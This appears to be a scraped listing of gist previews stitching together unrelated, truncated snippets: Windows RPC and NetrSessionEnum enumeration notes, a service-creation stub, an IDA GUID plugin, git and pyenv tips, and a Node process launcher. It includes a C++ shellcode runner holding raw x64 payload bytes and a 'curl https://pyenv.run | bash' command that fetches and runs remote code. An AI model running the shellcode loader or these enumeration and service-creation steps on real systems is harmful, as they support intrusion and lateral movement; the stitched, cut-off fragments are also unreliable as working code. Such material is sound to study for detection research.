Import-Module -Name NtObjectManager
$rpc = ls C:\Windows\System32\* | Get-RpcServer
$rpc | Where-Object {$_.InterfaceId -eq '4b324fc8-1670-01d3-1278-5a47bf6ee188'} | Format-List
$server = $rpc | Where-Object {$_.InterfaceId -eq '4b324fc8-1670-01d3-1278-5a47bf6ee188'}
$Proc12 = $server.Procedures | Where-Object {$_.ProcNum -eq 12}
$Proc12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
import argparse | |
def hex_string_to_guid(hex_string): | |
# Convert the hex string to bytes | |
guid_bytes = bytes.fromhex(hex_string) | |
if len(guid_bytes) != 16: | |
print("Invalid GUID hex string length") | |
return None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git rm --cached submodule_path # delete reference to submodule HEAD (no trailing slash) | |
git rm .gitmodules # if you have more than one submodules, | |
# you need to edit this file instead of deleting! | |
rm -rf submodule_path/.git # make sure you have backup!! | |
git add submodule_path # will add files instead of commit reference | |
git commit -m "remove submodule" |
First function definition:
ms opendocs here:
create the function signature NET_API_STATUS NetrSessionEnum( SRVSVC_HANDLE ServerName, WCHAR* ClientName, WCHAR* UserName, PSESSION_ENUM_STRUCT InfoStruct, DWORD PreferedMaximumLength, DWORD* TotalEntries, DWORD* ResumeHandle)
For this cast to work you need to import two structs:
Severice Creation Logs: Security 4697 and System 7045
Create Service
# Define service parameters
$serviceName = "MyTestService"
$serviceDisplayName = "MY Test Service"
$serviceDescription = "This is a test service created for demonstration purposes."
$serviceExecutablePath = "C:\Windows\System32\cmd.exe"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import idaapi | |
import idautils | |
import idc | |
import struct | |
CONTEXT_MENU_PATH = 'GUIDConvert/' | |
ITEM_NAME = 'Convert GUID Bytes' | |
class GuidConverterActionHandler(idaapi.action_handler_t): | |
def activate(self, ctx): |
it has come to my attention that people still have problems with their python environment.
- install pyenv with
curl https://pyenv.run | bash
pyenv install 3.11
now you have the latest python (it can also install pypy, anaconda and many others if you need)pyenv global 3.11
now you have a global pythonpyenv virtualenv 3.11 ape
now you have a virtualenvpyenv local ape
now the project folder contains .python-version which automatically activates the environment when you enter the folder
read more about pyenv here https://github.com/pyenv/pyenv-installer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <Windows.h> | |
int main() | |
{ | |
char shellcode[] = "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00" | |
"\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8" | |
"\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00" | |
"\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33" | |
"\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var exec = require('child_process').execFile; | |
var fun =function(){ | |
exec('<exe path>', {cwd: '<directory>'}, | |
function(err, data) { | |
console.log(err) | |
console.log(data.toString()); | |
}); | |
} | |
fun(); |
NewerOlder